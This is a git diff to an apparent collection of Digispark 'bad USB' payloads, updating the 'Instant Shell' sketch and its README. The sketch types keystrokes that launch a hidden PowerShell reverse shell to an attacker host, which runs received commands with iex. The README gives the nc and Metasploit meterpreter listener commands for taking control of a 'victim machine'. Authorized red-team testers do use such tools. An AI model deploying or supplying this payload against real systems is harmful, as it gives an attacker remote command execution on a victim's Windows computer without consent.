diff --git a/payloads/Instant Shell/Instant_Shell.ino b/payloads/Instant Shell/Instant_Shell.ino index 6481d5b..ec9390d 100644 --- a/payloads/Instant Shell/Instant_Shell.ino +++ b/payloads/Instant Shell/Instant_Shell.ino @@ -24,7 +24,7 @@ void loop() { DigiKeyboard.delay(2000); DigiKeyboard.println("cmd");//run cmd DigiKeyboard.delay(2000); - DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker + DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker DigiKeyboard.delay(5000); digitalWrite(1, HIGH); //turn on led when program finishes DigiKeyboard.delay(90000); diff --git a/payloads/Instant Shell/README.md b/payloads/Instant Shell/README.md index c08889a..30f81e4 100644 --- a/payloads/Instant Shell/README.md +++ b/payloads/Instant Shell/README.md @@ -2,10 +2,23 @@ ### Description: -#### 1: Install_Shell.ino:
+#### 1: Instant_Shell.ino:
Starting instant shell to an attacker machine in less than 1 minute.
-**Instuctions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Depends on your computer, play with the delay.
+**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/) + +Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html) + +**Instructions:** +Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer. + +``` +nc -lvnp 4444 +``` + +``` +msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 4444; set ExitOnSession false; exploit -j" +``` **Tested on:**
**OS**: Windows 10|11